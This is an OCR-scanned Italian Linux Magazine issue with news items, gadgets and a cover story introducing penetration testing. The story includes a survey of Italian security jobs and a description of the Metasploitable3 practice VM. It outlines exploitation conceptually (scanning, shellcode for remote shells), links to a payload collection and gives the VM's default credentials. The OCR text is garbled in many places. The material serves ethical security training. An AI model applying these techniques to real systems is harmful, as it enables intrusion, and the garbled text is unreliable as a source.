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che nei prossimi dieci anni molte delle 
| mansioni manuali verranno svolte da ro- 
bot. Questo peo significa che i posti 


è informatica. r questo motivo oggi come 
oggi studiare informatica, e in partico- 
lare la sicurezza informatica, è il modo 

| migliore per prepararsi al mo do del 
| lavoro dei prossimi decenni. Purtroppo, i in 
Italia non esiste un percorso ufficiale per 
diventare esperti di sicurezza. Abbiamo 
quindi pensato ‘ di offrire ai nostri lettori un 
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campo, ri Lao a indagare la 
situazione. Sul nostro sito web si trovano 
i dettagli dell'inchiesta: hnttp://bit.ly/ 
infosecitalia. derralpilgtio. non è tutto 


pubblichiamo anche articoli per imparare 

a utilizzare Google Drive con Linux e a 
configurare server tramite Ansible. Questo 
oltre al solito appuntamento col corso per 
la certificazione Cisco CONA. 
Insomma, se sognate un futuro nel cam- 
po delle reti di computer questo numero 

di Linux Magazine è quello che fa per voi. 
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METASPLOITABLE 3 


| LA DISTRO PIU VULNERABILE 


Ecco come fanno i pirati (etici) a i entraresn qualsiasi 


Nel lato B del DVD presen- 
tiamo la versione Linux di 
Metasploitable3, la macchina 
virtuale appositamente buggata 
per permettere a tutti di eserci- 
tarsi negli attacchi usando Kali e 


|. Metasploit. Si tratta dello stesso 


sistema su cui basiamo il tuto- 
rial della cover story di questo 
numero della rivista. Il siste- 


© ma operativo su cui è basata 
|. Metasploitable3 è Ubuntu 14.04, 


da alcuni mesi ormai senza più 
supporto e quindi con pacchetti 
non più aggiornabili ma ancora 
in circolazione su alcuni server. 
Si tratta quindi di un apprendi- 
mento semi realistico: è impro- 


| babile che esistano davvero dei 


server con tutti questi bug, ma 
qualcuna di queste vulnerabili- 


pA 
| 


dpercorso 


PC 


tà esiste ancora sui server meno 
aggiornati. Il nome utente e la 
password per accedere al siste- 
ma, se doveste averne bisogno, 
sono entrambi vagrant. 

La macchina è infatti stata cre- 
ata tramite Vagrant, che può 
essere usato anche per pro- 
durre la versione Windows 
di Metasploitable3, basata su 
Windows Server 2008. Chi è inte- 
ressato può seguire le istruzioni 
sul repository ufficiale GitHub: 
http:/bit.ly/metasploitableSofficial 


La tecnologia 
per tutti! 


alla prima versione rilasciata nel lontano 

1985, Windows ne ha fatta davvero 

tanta di strada, conquistando un numero 
sempre maggiore di utenti fino a divenire il 
leader incontrastato degli OS. Tutto merito 
dell'impareggiabile esperienza d'uso garantita 
dal sistema operativo e dalle numerose 
funzionalità che, nel corso del tempo, Microsoft 
ha integrato e ampliato sempre più. Oggigiorno, 
nella sua release più recente, ovvero Windows 
10, quest'OS è diventato un vero gioiellino che 
brilla per stabilità, prestazioni, compatibilità e 
produttività. Ma usarlo non è poi così semplice. 
Ed ecco perché abbiamo chiesto ai nostri esperti 
di spiegare in modo semplice e diretto come 
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sfruttarlo al massimo. Con l'aumentare della 
diffusione del sistema operativo di BigM, anche 
un tema molto tecnico e complesso come il 
fotoritocco, è finalmente giunto alla portata di 
tutti. Photoshop, ad esempio, è tra i programmi 
più popolari e nel contempo, professionali che 
esistano... e non c'è cosa più bella che imparare 
a usarlo al meglio, lasciando a briglie sciolte la 
nostra creatività. E se poi riuscissimo a realizzare 
un bel sito con i nostri lavori, quale pubblicità 
migliore potremmo farci? Ed eccoci giunti al 
punto nodale: i siti Web. Imparare l'arte oscura 
del webmaster è la nostra nuova sfida. Allora, 
cosa aspettiamo? 

Buona lettura! 
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programmazione di app per Android 


in questo libro, potrai rimettere : ognituo scatto un capolavoro: ritagli, : eiOS?In questo libro troverai tanti 


a nuovo il tuo computer in modo : correzione di luci e ombre, regolazione 


rapido ed efficace con il fai da te. : cromatica e del contrasto... : nuove applicazioni di ogni genere. 


Li trovi in edicola! 


progetti da mettere in pratica per creare 


Flash 


Kali va 
“in borghese” 


Kali è una ottima distro per i 
penetration tester, la prendia- 
mo come riferimento anche 
per il nostro corso. Tuttavia, 

è un po’ troppo riconoscibile: 
se ci si trova a lavorare come 
Pen Tester in un ufficio, per 
verificare la situazione della 
rete aziendale, è possibile che 
qualcuno che si intende un po’ 
di sicurezza informatica rico- 
nosca il logo di Kali sullo scher- 
mo del nostro portatile e si 
insospettisca. L'ultima release 
di Kali, tuttavia, presenta una 
funzione chiamata “underco- 
ver”, che potremmo tradurre 
in italiano come “in borghese”. 
Questa funzionalità, che si 
attiva col comando kali-under- 


cover, trasforma il desktop in 
una sorta di Windows10, a un 
primo sguardo del tutto identi- 
co al sistema di Microsoft. 
Fonte: 


Zorin 0S 
non spia gli utenti 
Recentemente su Reddit è 
esplosa una controversia 
riguardo il sistema di conteg- 
gio degli utenti di ZorinOS. 
Il famoso sistema operativo, 
molto usato nelle scuole e negli 
uffici pubblici, invia periodi- 
camente un ping a un server 
usando un codice univoco. Gli 
utenti si sono preoccupati per 
la possibilità che questo codice 
possa permettere agli autori di 
Zorin di identificare ogni utente 
in base all’indirizzo IP. Tuttavia, 
i responsabili del sistema 
hanno specificato che il codice 
non viene calcolato sulla base 
dell'indirizzo IP, e serve solo 
per tenere traccia della diffu- 
sione di Zorin tra una versione 
e l’altra. Ad ogni modo, è già 
prevista l’implementazione di 
una casella di spunta per l’opt- 
out durante l’installazione. 
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CitBOT è il primo chatbot 
che parla di diritti umani 


L’associazione Luca Coscioni e Revevol hanno sviluppato un bot gratuito disponibile 24 ore su 24 
che risponde a domande sui diritti della persona, dal testamento biologico alla salute riproduttiva 


BM Negli ultimi anni ci siamo 
sempre più abituati ai chatbot 
per interagire con le aziende. 
La tecnologia dei chatbot non è 
perfetta, si tratta pur sempre di 
meccanismi di machine learning 
che cercano di approssimare il 
significato delle frasi che scrivia- 
mo e fornire una risposta in base 
a quello che credono sia stato 
richiesto. Dai tempi di Doretta, il 
famoso bot di MSN Messenger, si 
è comunque fatta molta strada, 
e oggi i bot sono in grado di aiu- 
tare molti clienti a capire quali 
prodotti di una azienda siano più 
adatti alle loro esigenze, oppure 
come eseguire gli ordini online 
e compilare moduli per richieste 
di vario tipo. Naturalmente, l’ita- 
liano è una lingua complicata, e i 
sistemi di Natural Language Pro- 
cessing sono meno affidabili di 
quelli per lingue come l'inglese e 
il francese. In buona parte perché 
poche aziende fanno ricerca su 
questo tema e le università sono 
mal finanziate, i principali passi 
avanti sono stati fatti dal CNR di 
Pisa. Ad ogni modo, anche azien- 
de italiane hanno iniziato a usare i 
chatbot per automatizzare alcuni 
rapporti con i clienti, soprattutto 
per la ristorazione e il settore al- 
berghiero. Oggi è infatti possibile 
contattare un bot per prenotare 
una stanza in albergo o per or- 
dinare del cibo. Naturalmente, 
anche la pubblica amministra- 
zione potrebbe ottenere grandi 
benefici dai chatbot, permettendo 
ai cittadini di ottenere risposte 
tramite il bot invece di dover fare 
la fila a uno sportello e tenere 
impegnato un funzionario pubbli- 
co. Esistono alcuni progetti, per 
esempio in Piemonte, e ci sono 
aziende che propongono dei bot 
proprio per gli uffici della PA, ma 


non abbiamo dati che dimostrino 
l'effettivo impiego di questa tec- 
nologia. Un altro ambito in cui i 
bot possono rivelarsi utili è l'in- 
formazione dei cittadini: vi sono 
infatti un sacco di questioni legate 
ai diritti (e doveri) che le persone 
non conoscono, e su cui è difficile 
trovare informazioni persino nei 
vari uffici pubblici. Ci ha pensato 
l'Associazione Luca Coscioni, con 
l'azienda Revevol, realizzando il 
primo bot dedicato all'informa- 
zione sui diritti civili. Revevol è 
una azienda fondata da Massi- 
mo Cappato, fratello del politico 
radicale Marco famoso proprio 
per la vicinanza all'associazione 
Coscioni e per l'autodenuncia 
dopo avere accompagnato Fa- 
biano Antoniani in Svizzera per 
ricorrere all’eutanasia. Il bot, 
chiamato CitBOT, è raggiungibile 
tramite il sito web www. citbot.it 
oppure tramite il bot Telegram a 
TeleCitbot. La sua sperimenta- 
zione è iniziata a giugno, e ormai 
è operativo in molti ambiti, dal 
testamento biologico alla salute 
riproduttiva e il diritto d'asilo. La 
speranza è di offrire le informa- 
zioni necessarie alle persone in 
difficoltà, sopperendo alle ca- 
renze del sistema pubblico. Per 
esempio, una coppia che scopre 
di avere una gravidanza inde- 
siderata potrà ottenere subito 


| rornooenza 
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le informazioni di cui ha biso- 
gno, senza correre il rischio di 
subire la tipica discriminazione 
che si riceve rimbalzando tra un 
obiettore di coscienza e l'altro. 
Secondo i dati dell'associazione 
Coscioni, almeno 15 mila don- 
ne l'anno rinunciano a tutele 
ginecologiche, persino alla con- 
traccezione di emergenza, per 
timore di essere stigmatizzate 
mentre parlano con un obiettore. 
IL bot è in grado di imparare dalle 
conversazioni, e verrà man mano 
allenato su altri temi, per offrire 
una base di conoscenze legali e 
mediche per ogni persona, 24 
ore su 24 e 7 giorni su 7. Si tratta 
del primo tentativo in Italia, e uno 
dei primi in Europa, per offrire 
ai cittadini informazioni su temi 
sensibili, riducendo l'imbarazzo 
del parlare con un'altra persona. 
Naturalmente, il bot è allena- 
to per riconoscere le situazioni 
che richiedono l'intervento di un 
medico, e nel caso invita l'utente 
a rivolgersi al corretto speciali- 
sta. AL momento sono già diver- 
se migliaia gli utenti che hanno 
contattato il bot, segno che ef- 
fettivamente si sentiva il bisogno 
di ottenere chiarimenti su questi 
temi delicati da una fonte auto- 
revole ma comunque con cui è 
possibile avere un dialogo. 
Fonte: http://bit.ly/citbot 


CIThot, l'intelligenza artificiale per le libertà civili - VERSIONE DITEST 


Quelta che vuoi sapere su testamento biologico, eutanasia, aborto e contraccezione d'emergenza, o puo! chiedere qui. 
E un progetto dell'Associazione Lucs Coscioni e dell'Associazione Soccorso Civile. Grazie ad un sisterna di inteligenza artificiale 


grazie all'interazione con i cittadini. Buona conversazione! 


Segnalaci sventuali risposta estate inviandoci una mail con comanda e risposte errata a citbotPassoriazionelucacosciniat. Ser 


aiutare a migliorare le nisposte. 


Pet sostenere l'Associazione Luca Coscioni, clicca QUI 


Per tastara i miovi argomanti (diritto desio, cure pallative, fecondazione assistita, informazioni generali sul'Associazione Luca (‘ 


Disclaimer 


Google Stadia 
disponibile 
anche in Italia 


Il servizio per giocare in streaming, di fatto 


noleggiando un server Linux con GPU, 
è ora accessibile anche a utenti italiani 


BA Da poche settimane il servizio gaming di Go- 
ogle, chiamato Stadia, è disponibile anche in Ita- 
lia. Da molti è considerato una potenziale rivolu- 
zione, perché svincola gli utenti dalla necessità 
di continuare a sostituire il proprio PC dome- 
stico o cambiare la console per stare appresso 
alle sempre maggiori richieste di RAM e velocità 
dei processori tipiche degli ultimi videogame. 
Sostanzialmente con l'abbonamento Pro, che 
costa 9,99 euro al mese, si ottiene una macchina 
remota dotata di un sistema Linux, 16G di RAM, e 
una GPU AMD con 56 Compute Units. Insomma, 
abbastanza da garantire il funzionamento anche 
dei giochi più elaborati. Naturalmente, la con- 
tropartita è che serve una connessione veloce: 
la fibra ottica oppure il 56, altrimenti si rischia 
una latenza che ovviamente nei giochi non è irri- 
levante. Sarà curioso vedere come si comporte- 
rà il servizio in Italia, paese che notoriamente ha 
poche connessioni ad alta velocità. Il problema 
del nostro paese è infatti che basta allontanarsi 


dai grandi centri abitati per non riuscire a tro- 
vare connessioni che superino i 10Mb/s effettivi. 
Trattandosi di un servizio di Google, se venisse 
richiesto da molti utenti potrebbe spingere gli 
operatori di telefonia a migliorare la velocità 
delle connessioni. Inoltre, siccome il sistema 
operativo è Linux con API Vulkan (una versione 
modernizzata di OpenGL), è possibile che questo 
spinga molti produttori di videogame a sviluppa- 
re sempre più per sistemi GNU/Linux. Chi è in- 
teressato può acquistare il pacchetto Premiere 
Edition per 129 euro, che include un Chromecast 
Ultra {da collegare al televisore], un controller, 
e tre mesi di Stadia Pro. Interessante anche la 
possibilità per l'utente di continuare a usare i 
giochi che acquista anche se in futuro il vendi- 
tore dovesse sciogliere l'accordo di vendita con 
Google. L'abbonamento può anche essere mes- 
so “in pausa”: se non si pagano alcuni mesi i gio- 
chi rimangono salvati, e quando si paga di nuovo 
si può riprendere da dove ci si era fermati. 


PinePhone: uno smartphone 
economico con GNU/Linux 


Tenere in tasca la propria privacy potrebbe costare soltanto 150 dollari 


| primi Librem5, smartphone 
dotati di un sistema GNU/Linux 
progettati per la privacy, sono da 
poco arrivati nelle mani dei primi 
utenti, e un altro prodotto simile è 
stato lanciato in forma sperimen- 
tale: il PinePhone. Si tratta natu- 
ralmente di due progetti con tar- 
get ben diversi: il Librem5 è uno 
smartphone di fascia alta, costa 
699 dollari, ed è pensato per es- 
sere duraturo (basti pensare che 
si può sostituire la batteria senza 
bisogno di passare da un centro 


assistenza). Il PinePhone è invece 
pensato per offrire le caratteristi- 
che di uno smartphone di fascia 
bassa, rendendo quindi la privacy 
a portata di tutti. Con un prezzo di 
appena 149 dollari è infatti molto 
economico, e non è difficile im- 
maginare che qualcuno decida di 
investire questa somma per ave- 
re uno smartphone che comun- 
que offre molta più privacy di un 
normale dispositivo con Android 
e iOs. Anche il PinePhone dispone 
di kill switch hardware per disa- 


bilitare microfono, fotocamere, e 
GPS in modo da non essere trac- 
ciabili. Non è chiaro esattamente 
quale sistema operativo sarà il 
predefinito, anche se sono stati 
presentati alcuni video con Pla- 
sma Mobile. Naturalmente, per 
il basso prezzo le caratteristiche 
sono basilari: il PinePhone offre 
2G di RAM e 16GB di memoria in- 
terna, contro i 3GB e 32GB del Li- 
brem. Inoltre, le fotocamere sono 
da 5MP e 2MP, mentre il Librem 
le offre da ben 13MP e 8MP. 
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Gadget che non ti aspetti 


Abbiamo selezionato per te i più originali device del mese. 
Spesso sono folli, altre volte utili. E se ti va bene: utili e folli insieme! 


BISCOTTI A FORMA DI TUX 


Non è troppo difficile trovare stampi per biscotti di pasta 
frolla a forma di animali, pinguini inclusi. Ma Tux, la mascotte 
di Linux, non è un pinguino qualsiasi. Quindi, per un vero 
appassionato di open source lo stampo proposto da 

Etsy è un elemento fondamentale della propria cucina. 
Naturalmente, consigliamo di glassare i biscotti con della 
ghiaccia reale bianca, e gialla, e magari del cioccolato per il 
colore nero. : 

Per informazioni: Atip://bit.ly/biscottolinux 


LA TAZZA PER I COLLEGHI 


Non sempre si ha un ottimo rapporto con i colleghi, ma quando si 
ha la fortuna di trovarsi bene con i propri compagni d’ufficio si può 
scherzare. E se si lavora con dei colleghi sysadmin avere delle tazze 
simili è un buono modo per presentarsi come un gruppo anche 
davanti agli altri dipendenti. 
Nerd herd significa 
“branco di Nerd”, 

quindi un buon modo 

per scherzare sulla 

propria capacità di 

usare i computer 
probabilmente superiore 
agli altri dipendenti. 
Per informazioni: 
http://bit.ly/tazzanerd 


NERD 
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UN GAMEPAD RETRÒ 


Peri veri appassionati dei videogame degli anni ‘90 questo gamepad 

è l'abbinamento perfetto con un RaspberryPi 3 dotato di RetroPie. Il 
controller ricorda perfettamente l’autentico gamepad della cosnole Super 
Nintendo Entertainment System, e funziona tramite bluetooth. È quindi 
consigliabile usare un Raspberry che sia dotato di scheda Bluetooth 
incorporata. Si può ricaricare con un cavo USB-C, in dotazione. 

Per informazioni: http://bit.ly/8bitdoretro 


PENDRIVE PER AUTENTICAZIONE 


La Yubico è una pendrive che memorizza le chiavi per l’accesso 

a diversi siti, come Google, GithHub, e Facebook per esempio. È 
progettata per essere molto resistente agli urti e all'acqua. Questo 
perché l’idea è ovviamente di portarla sempre con sé, tipicamente 
con una catenella o collana. L'utilizzo di questo dispositivo 

riduce la probabilità di subire un furto delle credenziali, perché un 
malware non ci può sottrarre il dispositivo fisico. 

Per informazioni: http://bit.ly/penautenticazione 


0-0 d a g e e k 
ME 
non sono motlo semplici da perfetto per quelle situazioni 
utilizzare su sistemi GNU/ in cui si rischia di avere poco 
Linux. Il modello MF823 di campo. 


ZTE è invece riconosciuto 
Per applicazioni sul campo è automaticamente dalle 


spesso necessario ricorrere 
a una connessione tramite il 
4G, ma le chiavette disponibili 
presso i principali operatori 


Quando si assembla qualche oggetto usando delle viti con dadi esagonali 
servono delle chiavi. Si possono usare delle chiavi inglesi, oppure delle 
chiavi a tubo. Si trovano facilmente chiavi inglesi ad apertura variabile, 
meno ovvio è trovare chiavi tubolari variabili. Questo nuovo design con 
dei pin che rientrano, però, è la soluzione perfetta per chi debba fissare 
dadi di dimensione variabili. 


Per gli appassionati di Minecraft, 
questa torcia è fondamentale 
per illuminare la propria casa. 

La base è modificabile: può 
avere sia una base piana che 
una obliqua. La base piana è 

ovviamente comoda per tenere 
la torcia su un mobile, mentre 
la versione obliqua permette 

il facile fissaggio su parete. Si 
tratta di una luce debole, ed è 
alimentata da 3 pile AAA. 


moderne distro, ed è slegato 
da qualsiasi operatore. Inoltre, 
offre due connettori per una 
antenna esterna, quindi è 


LUCI 
mi > da PER LA NAVE 
KIT LUCE LED PER LEGO. 


Questo kit di luci al LED è progettato per il 
modello Lego 21313: una classica nave in 
bottiglia. Il modellino va acquistato a parte, 


e ovviamente è un ottimo regalo per bambini 

e adulti. Però il vero tocco di classe è questo 
minuscolo impianto di illuminazione, da 
alimentare con tre pile AAA. Eventualmente, si 
può utilizzare anche un caricabatterie USB come 
fonte di alimentazione. 

Per informazioni: Mffp://bit.Iy/lucichiave 
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NEL DVD 
LA VIRTUAL 
MACHINE 
PREINSTALLATA 
E PRONTA A 
SFERRARE GLI 
ATTACCHI! 


Ecco come fanno i pirati ad entrare in qualsiasi PC 
connesso alla Grande Rete! Inizia con noi questo 
percorso facile e pratico (ma etico!) di penetration testing 


on la diffusione dell'automazione, buona parte dei 
mestieri che richiedono l’attività manuale sono 
destinati a scomparire nei prossimi 10, al mas- 
simo 20, anni. Nelle fabbriche metalmeccaniche 
gli operai saranno sostituiti da robot. Già adesso produzioni 
molto complicate come quelle di Tesla sono svolte quasi in- 
teramente da robot, con gli operai che si occupano più che 
altro di spostare il materiale nel magazzino e rifinire i dettagli 
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dell’assemblaggio. Persino molte attività legate al trasporto 
di merci e persone saranno svolte da robot, con automobili e 
treni in grado di viaggiare da soli. Persino i commercianti che 
si occupano di rivendere prodotti rischiano di sparire, visto 
che è ormai normale per molti consumatori comprare di tut- 
to, anche generi alimentari, direttamente online direttamente 
dai produttori o tramite grandi “warehouses” come Amazon. 
Anche il settore primario si trova attualmente in difficoltà per- 
ché il costo della manodopera è troppo alto per il prezzo 
che il pubblico è disposto a pagare per farina, latte, e carne, 


SERVONO ESAMI 
E CERTIFICAZIONI? 


Facendo un semplice giro sul web si trovano facilmente di- 
versi tipi di certificazioni, da parte di varie aziende o enti, de- 
dicate alla sicurezza informatica. La domanda, considerando 
che non costano poco, è se siano davvero utili nel mondo 
lavorativo. La risposta è che dipende: la maggioranza dei 
datori di lavoro è più interessata alle esperienze precedenti, 
che agli esami superati. Avere un certificato può essere utile 
per chi si avvicina a questo mondo e quindi ovviamente non 
dispone di nessuna esperienza presso altre aziende, per 
dimostrare di avere almeno una base teorica. Tuttavia, non 
tutte le certificazioni sono uguali: quelle basate su semplici 
domande a risposta multipla e quiz vari sono valutate molto 
poco. Le certificazioni che vengono considerate con una 
certa attenzione sono quelle che prevedono una simulazione 
pratica. La più famosa è la OSCP, di Offensive Security [gli 
stessi sviluppatori di Kali Linux). Per superare questo esame 
si ha a disposizione un ambiente VPN con delle macchine da 
crackare entro 24 ore. Naturalmente, il costo è abbastanza 
alto: per seguire il corso di formazione, più 30 giorni di ac- 
cesso al laboratorio da remoto per allenarsi, e l'esame finale © 
sono richiesti 800 dollari. Nel caso sia necessario ripetere 
l'esame, si pagano altri 150 dollari. Attp:/bit.ly/corsooffensive 


ed è probabile che nei prossimi decenni appariranno le pri- 
me fattorie quasi del tutto automatiche. Parlando di decenni 
sembra un tempo lontano, ma in termini di vita lavorativa 
è molto vicino. Insomma, siamo all’alba di una rivoluzione 
enorme, dalla portata probabilmente maggiore rispetto alla 
rivoluzione industriale. 

Il numero complessivo di posti di lavoro, però, non è desti- 
nato a calare drammaticamente: con la diffusione di sistemi 
computerizzati è infatti sempre più importante avere degli 
amministratori di sistema e degli esperti di sicurezza, che 
possano tenere sotto controllo i vari sistemi per assicurarsi 
che i criminali informatici non possano fare danni. Del resto, 
se man mano affidiamo sempre più parti della nostra vita a 
dei computer è fondamentale accertarsi che questi compu- 
ter siano quanto più sicuri possibile. Siccome la totale sicu- 
rezza è un’utopia, è facile prevedere che nei prossimi anni ci 
sarà una sempre maggiore richiesta di esperti di sicurezza. 
In buona parte, gli esperti in questione saranno Penetration 
Tester, o comunque dovranno avere una certa esperienza 
del Penetration Testing. Insomma, la sicurezza informatica 
sarà il lavoro del futuro per molti italiani, e abbiamo deciso di 
iniziare un corso a puntate per introdurre anche i principianti 
alle basi dell’affascinante mestiere di Penetration Tester. 


COS'È IL PEN TESTING? 


Il penetration testing, come suggerisce il nome, è l’attività 
in cui si prova a entrare in un sistema per verificare se sia 
sicuro. Di solito si viene assunti da una azienda per testare 
la sicurezza di un gruppo di computer, di una rete, o di un 
edificio. Un Pen Tester è incaricato di comportarsi come il 
peggiore dei criminali, ma può farlo in modo assolutamente 
legale perché è la “vittima” stessa a averlo richiesto. Fun- 
ziona un po’ come con i crash test: le aziende pagano degli 
esperti per distruggere una automobile, in modo da capire 
come migliorare la sicurezza. 

Esiste tutta una terminologia legata all'ambiente della sicu- 
rezza informatica, come white hat e black hat, oppure blue 
team e red team. Non entreremo nei dettagli, ma possiamo 
semplificare in questo modo: un Pen Tester è solitamente un 
white hat, una persona che utilizza le tecniche di intrusione 
per scoprire vulnerabilità e aiutare le aziende a correggerle 
prima che un black hat (un malintenzionato) possa sfruttarle 
per far danni. 

Il principale problema dei rapporti, digitali o cartacei, lasciati 
sulla scrivania di un amministratore aziendale è che a volte 
rimangono lì, sulla scrivania. Per aiutare davvero l’azienda 
a proteggere i suoi computer e quindi i dati dei clienti, i pen 
tester (il read team) devono collaborare con il personale in- 
formatico interno all'azienda stessa (il blue team), fornendo 
suggerimenti pratici per tappare le falle. Questa collabora- 
zione tra i due gruppi è chiamata purple teaming, visto che 
dall’unione di rosso e blu si ottiene il viola. 

Il lavoro di Pen Tester, e più in generale ogni lavoro con- 
nesso alla sicurezza informatica, è quindi impegnativo: biso- 
gna tenersi continuamente in allenamento e aggiornati sulle 
ultime vulnerabilità scoperte da altri esperti di sicurezza. E 
bisogna anche mantenere buoni rapporti con i colleghi e i 


COME FUNZIONA UN EXPLOIT? 


Tra alcune pagine spiegheremo passo passo come condur- 
re un attacco contro una macchina virtuale appositamente 
vulnerabile, nel DVD allegato alla rivista. In particolare, 
l'attacco che dimostriamo è un classico exploit remoto. 
Ovviamente ogni attacco è diverso dagli altri, ma la logica di 
base è sempre la stessa: si comincia con una scansione. Si 
possono utilizzare strumenti manuali come Nmap o toolkit 
automatici come APT2 (http://bit.ly/toolkali), l'importante 

è analizzare il sistema che si sta attaccando per scoprire 
quali possano essere le sue vulnerabilità. Sulla base delle 
porte TCP aperte, e della versione dei software installati, 
si può capire quali bug siano presenti. Si fa poi una rapida 
ricerca in base a ciascuno dei bug identificati, per vedere 
quale di questi offre un exploit. Gli exploit sono banalmente 
dei programmi che sfruttano la vulnerabilità per ottenere 
qualcosa che può interessare il malintenzionato, come un 
blocco del sistema (Denial of Service] oppure un terminale 
remoto. Per ottenere il terminale remoto si deve solita- 
mente usare l'exploit per inoculare nel sistema vittima uno 
shellcode. Questo è un codice di vario tipo [spesso codice 
binario) che attiva un terminale remoto accessibile tramite 
una connessione TCP. Per avere una idea di come siano 
fatti gli shellcode, possiamo vistare una delle più grandi 
raccolte: htip://bit.ly/allpayloads. Ottenuto il terminale remo- 
to, il Pen Tester ha dimostrato l'esistenza di una vulnera- 
bilità, e per capire quanto grave sia la cosa di solito usa il 
terminale per controllare se si possa accedere a dati sen- 
sibili. Tutto questo deve esser documentato e inserito nel 
proprio rapporto. Gli exploit vengono creati da altri esperti 
di sicurezza, pagati per analizzare i programmi eseguibili 

o direttamente il codice sorgente, e scoprire i punti deboli. 
Le principali aziende di informatica hanno degli esperti 
che svolgono questo mestiere per loro, e offrono anche dei 
programmi di “bug bounty” (caccia ai bug) aperti a tutti. Per 
esempio, Google offre dai 500 dollari a oltre 30000 dollari a 
chi riesce a trovare un bug che porta a privilege escalation 
nella piattaforma web per un exploit completo che riesce a 
uscire dalla sandbox (htfp://bit.ly/rewardschrome). 

Le ricompense sono così alte perché, ovviamente, è molto 
difficile trovare alcuni bug e riuscire a sfruttarli corretta- 
mente. 


datori di lavoro (o i clienti, a seconda del proprio ruolo). E 
anche importante conoscere un gran numero di dispositivi 
hardware e software, avere una infarinatura di un po’ tutto e 
essere pronti a trovarsi davanti qualsiasi cosa. Ma è anche 
un impiego gratificante e, nei limiti delle forme contrattuali 
che esistono oggi giorno, anche un lavoro abbastanza sicu- 
ro. Per capire meglio la situazione lavorativa nel campo della 
sicurezza informatica in Italia, abbiamo realizzato un son- 
daggio: in queste pagine potete vedere alcuni dei grafici che 
abbiamo prodotto per commentare le risposte. Per appro- 
fondimenti, e per scaricare i dati in formato grezzo, potete 
visitare il nostro sito web all’indirizzo http://bit.Iy/infosecitalia. 
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IMI Accesso fisico a edifici e dispositivi 

{EI Exploit su sistemi mobile (105, Android, etc...) 
= Reverse engineering hardware e software 

si Analisi del codice sorgente 

[EE Exploit a ioT e sistemi embedded 

3 Analisi degli errori nella configurazione di server 
BB Exploit iocali 

Di Exploit remoti 

( Exploit delle web app 


LE COMPETENZE 
PIU RICHIESTE 


La competenza più richiesta ai Pen Tester 
in Italia è l’exploit delle web app. Cioè le 
applicazioni in PHP o ASP, per esempio, che 
vengono installate sui server web. Seguono 
gli exploit remoti e Locali, cioè il tentativo di 


entrare nei server e i computer dell'azienda. 


La meno richiesta, ma comunque conside- 
rata importante, è il phisical penetration 
testing, cioè l'ingresso in edifici che dovreb- 
bero essere protetti da sistemi di sicurezza 
(lucchetti meccanici o elettronici) per l'im- 
portanza dei dati contenuti al loro interno. 


di Toscana 


si Friuli-Venezia Giulia 
Sì Trentino-Alto Adige 


Di Piemonte 


E Emilia-Romagna 


#é Lombardia 
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Età: 26-35 


I PAESI IN CUI 
UN PEN TESTER, 
E PAGATO DI PIU 


| tre paesi in cui un esperto di sicu- 
rezza, e un Pen Tester in particolare, 
viene pagato meglio sono in ordine la 
Germania, il Regno Unito, e la Svizzera. 
Seguono Stati Uniti e Francia: conoscere 
le lingue può quindi essere una buona 
cosa per avere la possibilità di lavorare 


Età: 36-50 


all'estero. 
DI) sudatrica 
bi Olanda 
Li Repubblica Ceca TI tizvoro occupa buona parte della propria vita, e questo è stressante 
e DE IR tempo da dedicare al lavoro è accettabile 
| Norvegia 
(Arabia Saudita UANTO TEMPO 
BE cenmarca DEDICA AL LAVORO? 
z Francia C'è una differenza sostanziale di vedute tra 
Stati Uniti . Ze a A pra 
i Pen Tester più giovani, tra i 26-35 anni, e i 
Svi: 
z Le meno giovani, tra i 36 e i 50 anni, per quanto 
Î) cermania riguarda il tempo da dedicare al lavoro. | più 


giovani infatti sostengono per la maggioranza 
che il tempo da dedicare al lavoro sia tutto 
sommato accettabile, mentre i meno giovani 
ritengono che il lavoro occupi troppo tempo 
nella propria vita e la cosa sia fonte di stress, 
Questo si può spiegare con la sindrome da 
Burn Out, tipica di mestieri ad alta responsabi- 
lità come il Penetration Testing. Purtroppo, il 
nostro sistema sanitario e di previdenza sociale 
non è molto moderno per quanto riguarda il 
riconoscimento dello stress da lavoro. 


i 


IN. QUALI REGIONI 
C'E PIU LAVORO? 


La Lombardia è chiaramente la regione in cui con- 
viene vivere per lavorare come esperti di sicurezza 
informatica. Seguono il Lazio e il Veneto. Purtroppo, 
il Sud Italia non rientra nemmeno nelle prime 5 re- 
gioni, che appartengono tutte al centro-nord. Questo 
conferma una desolante mancanza di opportunità di 
lavoro nel mezzogiorno persino per i mestieri legati i 
all'informatica, che non dovrebbero avere bisogno di 
grandi infrastrutture e enormi capitali. 


Femmine Maschi 


z Cè vera e propria discriminazione 0 mobbing 
IDE Gi uomini icevono meno tutele delle conne nella pateemtà 
La situazione è paritaria, tutti vengono irallati allo stesso modo i 
Le donne ricavono meno opportunità dî avanzare nella carriera 
SE Lo donne ricevono meno tutele degli vomini nella maternità 
SÌ Le donne vengono pagate men degli uomini 


IL GENDER GAP 


Sia femmine che maschi sono d'accordo sul 
fatto che le donne vengano pagate meno 
degli uomini nel complesso. Bisogna anche 
notare che vi è consenso sul fatto che alle 
donne vengano fornite meno opportunità 

di fare carriera. Questa è probabilmente 

la chiave di lettura corretta del problema 
del gender gap nell'informatica: le persone 
vengono pagate allo stesso modo per la 
stessa mansione, tuttavia le donne vengono 
mediamente penalizzate nell'avanzamento: 
della carriera. Questo fa sì che mediamente 
le mansioni più remunerative vengano asse- 
gnate a degli uomini. Il fenomeno è compli- 
cato, ma in altri ambiti lavorativi si è notato I 
come la paga media di una donna senza 
figli sia sostanzialmente identica a quella di 
uomo. Questo fa supporre che la maternità 

sia ancora considerata un “problema” da 
alcuni datori di lavoro. Non abbiamo però 
abbastanza dati per capire se questo sia 

vero anche nel campo dell'informatica. 


i 
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Certificazioni professionali 
Corsiin aula 
Corsi onfine igratulti o a pagamento) 


| TUTELE DEI 
i LAVORATORI 


La maggioranza dei lavoratori dell'in- 
formatica ritiene che al momento le tu- 
tele lavorative siano appena sufficienti. 
Solo tra i 26 e i 35 anni c'è una buona 
percentuale di lavoratori che considera 
buone le tutele attualmente disponibili. 
Per il resto, spicca la percezione di tu- 
tele assolutamente insufficienti in parte 
tra i 26 e i 35 ani, ma soprattutto tra i 
36 e i 50 anni. Che è singolare se unito 
al dato sulla necessità della costituzio- 
ne di un sindacato, ma è probabilmente 
dovuto a una generale sfiducia nel fatto 


‘ che un sindacato possa migliorare la si- 


tuazione. In altre parole, gli adulti tra i 
36 e i 50 anni considerano la situazione 


za informatica fortemente sbilanciata 
verso l'insufficienza, ma non è chiaro 


| se la situazione possa essere miglio- 


rata. 


fur 1825 t18:2035 


tene 


DOVE SI STUDIA L'INFORMATICA? 


